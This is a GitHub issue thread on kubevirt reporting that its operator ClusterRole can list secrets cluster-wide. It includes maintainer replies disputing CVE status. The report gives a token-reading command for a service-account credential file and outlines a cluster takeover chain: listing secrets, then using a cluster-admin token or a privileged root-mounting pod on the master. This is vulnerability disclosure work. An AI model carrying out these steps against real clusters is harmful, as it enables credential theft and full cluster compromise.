-
Notifications
You must be signed in to change notification settings - Fork 1.3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
A potential risk in kubevirt that could lead to takeover of the cluster #11735
Comments
Thanks for your report. Generally speaking are the operator (and other infra components. infra components are usually only accessible to the admin persona. And deployment requires cluster-admin privileges) required to have elevated privileges in order to perform system level actions in order to get the system or workload into the desired state. This is the core idea of operators.
While it is just one sentence above, this is the most critical part in your report: Gaining access to a "privileged" token. The POC and explanations then rather describe the Kubernetes behavior given a privileged token. Thus: Can you show, or did you find, a situation in which a regular user gains access to the "privileged" token of the virt-operator? |
Thanks for your reply! I think the regular user probably won't do it, but
the attacker will.as the following example shows:
1.
In cncf, there is a project named Carina, and the DaemonSet
csi-carina-node for that project has a cluster role named
carina-csi-node-rbac, which has the "get list watch update watch"permission
on the "node" resource.
2.
carina's deployment csi-carina-provisioner can be run randomly on worker
nodes.
3.
A pod in *kubevirt* has a cluster role with "list" permissions on the
"secrets" resource. Therefore, the pod in kubevirt can list all keys in the
entire cluster.
4.
If a malicious user takes control of a worker node, by default the
"csi-carina-node" pod will run on that node and he/she can use that pod to
patch/update other nodes and force *kubevirt*'s pod to run on the
malicious worker node. Then, he/she can use the token of *kubevirt*'s
pod to get the token of the cluster *cluser-admin *and perform a
cluster-level privilege elevation to take over the cluster. Alternatively,
by *obtaining the token for a ServiceAccount in the k8s cluster with
"create pods" privileges*, creating a privileged container mounted on
the root directory, and scheduling it to the master node using taint
tolerance, the attacker can access and leak the master's kubeconfig.
Overall, I think it is excessive and a potential security vulnerability to
grant "list secret" directly to ClusterRole in *kubevirt* . You need to
evaluate whether this authorization follows the principle of least
privilege and whether giving "list secrets" to ClusterRole is essential?
Can you consider more granular access control policies? For example, at the
namespace level.
… Message ID: ***@***.***>
|
Thanks.
I agree that coarse grained RBAC permissions are an issue and we should strive to have them more fine-grained. |
Yes, this is a serious problem! In response to this, can you request a cve
ID for us?
Fabian Deutsch ***@***.***> 于2024年4月18日周四 21:26写道:
… Thanks.
grant "list secret" directly to ClusterRole in *kubevirt*
I agree that coarse grained RBAC permissions are an issue and we should
strive to have them more fine-grained.
This is an action we should take.
—
Reply to this email directly, view it on GitHub
<#11735 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/BBBY3LQ4O5B5Y7TELSBSJNDY57CW3AVCNFSM6AAAAABGMM2QFWVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANRTHA3DIOBXGE>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
I'm not sure if this qualifies for a CVE. My line of thinking: In order to gain access to the SA of the operator, you have to find a bug in a different component to gain access to the node. |
Description
Dear Team Members:
Greetings! Our team is very interested in your project and we recently identified a potential RBAC security risk while doing a security assessment of your project. Therefore, we would like to report it to you and provide you with the relevant details so that you can fix and improve it accordingly. I have already sent the relevant details to your private email, but I couldn't confirm if you received it. That's why I raised the issue here. If there is anything inappropriate about it, I hope you can forgive me.
Details:
In this Kubernetes project, there exists a ClusterRole( kubevirt-operator�) that has been granted list secrets high-risk permissions. These permissions allow the role to list confidential information across the cluster. An attacker could impersonate the ServiceAccount bound to this ClusterRole and use its high-risk permissions to list secrets information across the cluster. By combining the permissions of other roles, an attacker can elevate the privileges and further take over the entire cluster.
we constructed the following attack vectors.
First, you need to get a token for the ServiceAccount that has this high-risk privilege. If you are already in a Pod and have this override, you can directly run the following command to get the token: cat /var/run/secrets/[kubernetes.io/serviceaccount/](http://kubernetes.io/serviceaccount/) token. If you are on a node other than a Pod, you can run the following command to get the kubectl describe secret .
Use the obtained token information to authenticate with the API server. By including the token in the request, you can be recognized as a legitimate user with a ServiceAccount and gain all privileges associated with the ServiceAccount. As a result, this ServiceAccount identity can be used to list all secrets in the cluster.
We give two ways to further utilize ServiceAccount Token with other privileges to take over the cluster:
Method 1: Elevation of Privilege by Utilizing ServiceAccount Token Bound to ClusterAdmin
Directly use a Token with the ClusterAdmin role permissions that has the authority to control the entire cluster. By authenticating with this token, you can gain full control of the cluster.
Method 2: Create Privileged Containers with ServiceAccount Token with create pods permission You can use this ServiceAccount Token to create a privileged container that mounts the root directory and schedules it to the master node in a taint-tolerant way, so that you can access and leak the master node's kubeconfig configuration file. In this way you can take over the entire cluster.
For the above attack chain we have developed exploit code and uploaded it to github: https://github.com/HouqiyuA/k8s-rbac-poc
Mitigation methods are explored:
Carefully evaluate the permissions required for each user or service account to ensure that it is following the principle of least privilege and to avoid over-authorization.
If list secrets is a required permission, consider using more granular RBAC rules. Role Binding can be used to grant list secrets permissions instead of ClusterRole, which restricts permissions to specific namespaces or resources rather than the entire cluster.
Isolate different applications into different namespaces and use namespace-level RBAC rules to restrict access. This reduces the risk of privilege leakage across namespaces
Looking forward to hearing from you and discussing this risk in more detail with us, thank you very much for your time and attention.
Best wishes.
HouqiyuA
The text was updated successfully, but these errors were encountered: